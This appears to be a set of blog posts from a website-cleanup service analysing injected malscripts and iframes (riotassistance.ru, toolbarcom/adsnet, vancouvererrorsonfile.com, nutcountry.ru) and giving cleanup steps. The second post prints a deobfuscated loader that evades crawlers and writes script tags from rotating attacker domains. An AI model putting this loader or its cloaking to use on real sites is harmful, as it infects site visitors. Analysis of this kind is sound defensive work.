By

riotassistance.ru infections

We’ve been seeing more website infections with a malscript that looks like:

(opening script tag) src="hxxp:// riotassistance.ru /Website.js">(closing script tag)

Note: We’ve also seen this same this but with nuttypiano replacing riotassistance.

Sometimes the last part: Website.js is something else:

Linux.js
Megabyte.js

and a few others. The common pattern here is obviously the riotassistance.ru domain and the last part of the URL has an upper-case first letter and is usually some random, but familiar word.

The other identifier is the seemingly useless string immediately following the malscript. In the example above it’s the:

Keep in mind that this will be different for each website, at least from what we’ve seen so far.

This malscript and it’s associated string has been found in index files and files that start with the word main, or in the footer.php file on WordPress sites. The footer.php that will be infected is usually in the theme folder for your site. So if you’re using the default theme, it will be the footer.php file in the theme/default folder on your site.

This same infection has been found in .js files as a document.write at the bottom of the .js file, such as this:

nuttypiano

Time to dig a little deeper…

We find that this domain is registered:

domain: RIOTASSISTANCE.RU
nserver: ns1.getyourdns.com.
nserver: ns2.getyourdns.com.
nserver: ns3.getyourdns.com.
nserver: ns4.getyourdns.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 8482 735000
e-mail: angles@fastermail.ru
registrar: NAUNET-REG-RIPN

According to abuse.ch, this registrar has 126 sites that associated to Zeus:

riotassistance.ru associated to Zeus registrar

We also find that the above listed email address is only registered on 4 other domains.

As far as cleaning this goes, obviously remove the malscript from your pages or replace the pages with known good backups.

From what we’ve found so far, this website infection happens via stolen FTP credentials. These FTP credentials are stolen by a virus/trojan on a PC that’s been used to FTP files to the infected website.

First, change all FTP passwords – immediately.

Second, run a full virus scan on all PCs used to FTP files to the infected website. This includes developers, authors, etc.

Third, if your site has been listed as suspicious by Google, request a review from the Google Webmaster Tools.

Post here if you have questions or send me an email if you’d like further help in cleaning this up.

Thank you.

By

toobarcom, mybar, adsnet infections

Over the past week or so, we’ve been fighting a new website infection. At first, it appeared to be infecting just one hosting provider, but as we investigated further, we found it was affecting websites on many hosting providers. I’m sorry that it’s taken so long to write about this but we’ve been seeing various new backdoors added to sites and I wanted to fully analyze those before writing this.

What we’re seeing is a malscript inserted either immediately before the legitimate code in certain .js (javascript) files or inserted in html and php files. If it’s in a .js file, you have to be careful because it appears to be part of the entire javascript code. There’s no spaces or line breaks between the malicious code and the legitimate code.

In .html and .php files we’ve usually seen it enclosed by ‘ads’ tags and script tags.

We’ve seen two variations of the malicious code:

The first one starts with:

var st1 = ;this.b=this.M="";this.A="";this.w=false;""...

and ends with:

var gr0=0;

The second starts with:
var st1 = 0;document. write( unescape('%3C%73...

and ends with:

gr0=0;

We’ll examine each one here to let you know what they’re doing.

The first one deobfuscates to this:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.",
"lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.",
"rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],
f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);
dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+
escape("holycookie")+";expires="+dt.toGMTString()+";path=/";

document. write ('(script tag) src=" hxxp: // '+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

When looking at this code, you’ll see that is uses a variety of user-agent strings:

  • yahoo
  • search
  • msnbot
  • yandex
  • googlebot
  • bing
  • ask

Then creates an array of domains:

  • myads.name
  • adsnet.biz
  • toolbarcom.org
  • mybar.us
  • freead.name

and then creates an array of prefixes:

  • axe.
  • box.
  • cox.
  • dex.
  • fax.
  • fix.
  • fox.
  • gox.
  • hex.
  • kex.
  • lax.
  • lex.
  • lox.
  • lux.
  • max.
  • mix.
  • nix.
  • oxo.
  • oxy.
  • pax.
  • pix.
  • pox.
  • pyx.
  • rax.
  • rex.
  • sax.
  • sex.
  • six.
  • sox.
  • tax.
  • tux.
  • vex.
  • vox.
  • wax.
  • xis.
  • zax.

When you consider the number of possible combinations of domains and subdomains, this becomes quite clear the hackers were looking to hide their locations.

The final part of the code puts it all together and adds a little more to the URL:

document. write(' (script tag) src="hxxp : //'+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

adding the ‘/system/caption.js’ to the end of whatever domain string it’s built.

So a typical string after this first code is decoded might look like:

(script tag) type="text/javascript" src="hxxp: //mix.freead.name/system/caption.js">
(script tag)

The second obfuscated string from above, uses the same basic methodology but uses these domains:

  • edisonsnightclub.com
  • gaindirectory.org
  • ideacoreportal.com
  • karenegren.com

and appends one of these strings to the front:

  • aqua.
  • azure.
  • black.
  • blue.
  • brown.
  • chocolate.
  • coral.
  • cyan.
  • darkred.
  • fuchsia.
  • gold.
  • gray.
  • green.
  • indigo.
  • ivory.
  • khaki.
  • lime.
  • magenta.
  • maroon.
  • navy.
  • olive.
  • orange.
  • pink.
  • plum.
  • purple.
  • red.
  • silver.
  • snow.
  • violet.
  • white.
  • yellow.

This malscript creates a document.write string that uses one of the above prefixes, one of the above domains and adds ‘/data/mootools.js’ to the end to complete the malscript.

If you’re looking for this malscript in your website, please make sure you grab the entire line all the way to ‘var gr0=0;’ (without the quotes) and nothing more. Otherwise, your legitimate code won’t function properly and you’ll have to restore from backup. Which, may not be a bad thing – unless, of course, you don’t have a good backup.

We’re still investigating how this infection starts. At first we thought it was WordPress based sites only. Then we realized that it was also infecting non-Wordpress sites. It might be the old compromised FTP credentials, but we haven’t been able to gather all our data yet. When we do, we’ll post an update here.

We’re also going to post about the backdoors we’ve found and you can search your site for them as well.

Until then, if you’re infected with this or if Google shows any of these domains in your Safe Browsing Diagnostic report (http://www.google.com/safebrowsing/diagnostic?site=), and you’d like us to clean it for you, please send me an email at traef@wewatchyourwebsite.com

Thank you.

By

Vancouvererrorsonfile infection

Over the past few days we’ve cleaned 312 infected websites all with the script:

(spaces added so it doesn’t set an alarm with your anti-virus program).

As of right now the following sites don’t recognize vancouvererrorsonfile.com as being malicious:

  • Google
  • Norton
  • rfc_ignorant
  • malc0de

However, McAfee’s SiteAdvisor and hpHosts do recognize it as being malicious.

At first it appeared that it was specific to one or two hosting providers, however as the infection carried on, we found it on at least 12 different hosting provider’s networks.

Looking at the server where this site is hosted, reveals other domains that have been used in various malscripts as well:

  • dottasink.net
  • nowisisdudescars.com
  • onlineisdudescars.com

and a few others.

These domains are all registered by the same person: hilarykneber@yahoo.com. This person is the contact person on whois records for 337 domains.

The name servers for vancouvererrorsonfile.com are:

  • ns1.masterhostingit.ru
  • ns2.masterhostingit.ru

Our service contiues to see these infections and clean them, even though these domains are not yet registered within Google’s Safe Browsing malware list. They have been submitted.

If you are infected with this, you can contact me at traef@wewatchyourwebsite.com and we will clean it for you.

If you have any other information to submit, please feel free to post comments.

Thank you.

By

Nutcountry.ru and Parkperson.ru iframes

Over the past week we’ve been seeing a lot of infected websites that have an iframe that contains one of these two URLs:

nutcountry.ru:8080/index.php
parkperson.ru:8080/index.php

A little searching found that approximately 25,000 web pages have the nutcountry.ru:8080/index.php iframe and another 516 web pages reference parkperson.ru:8080/index.php iframe.

What’s interesting is that none of the websites listed in the Google search for either of these two iframes, are listed with “this site may harm your computer” label.

We checked the Google Safe Browsing Diagnostic for nutcountry.ru and it shows:


It appears that Google just listed nutcountry.ru on 8-03-2010 which would explain why the web pages listed in a Google search aren’t showing the warning, “this site may harm your computer”.

And for parkperson.ru we found this:

parkperson.ru Google Safe Browsing Diagnostic page

Shows that as of 8-04-2010, Google has not found this site to be harmful or suspicious.

We attempted to download the files from parkperson.ru, or watch what infection might occur if visited and found that the domain does not exist and neither does nutcountry.ru.

What does all this mean?

It means, that over 25,000 websites were infected, but with an iframe that is harmless because the URL inside the iframe doesn’t go anywhere.

The other interesting aspect of this infection is that all the web pages appear to be ASP code (.asp or .aspx). Based on the location of the harmless iframes, it appears to be another ASPROX infection.

If it is ASPROX, you’ll probably see the iframe in your SQL database. Based on the location of where the iframe appears in the web pages, it’s not a simple iframe injection. The iframe is actually buried in your SQL database. This will make it more difficult to remove. You should consult the services of a database administrator or a security company that knows SQL (yes we do!).

The next thing will be to determine how the code was inserted. This type of infection is referred to SQL injection. This happens when the input from a form or dynamically generated web page isn’t properly sanitized. If there’s a code plugin you’re using, or utilizing some standard software package in your .ASP code, please check for security updates. If you’ve had a programmer create something for you, contact them and have them check over all the code they created for you. Some where on your site you have a SQL injection vulnerability and it needs to be closed.

As stated, this time, the domains included in the iframe don’t exist. However, the next time, your visitors could get infected and your site could be blacklisted by Google and many other services.

If you need assistance with this, please send me an email at traef@wewatchyourwebsite.com.

If you have other information about this infection, please post it as a comment.

Thank you.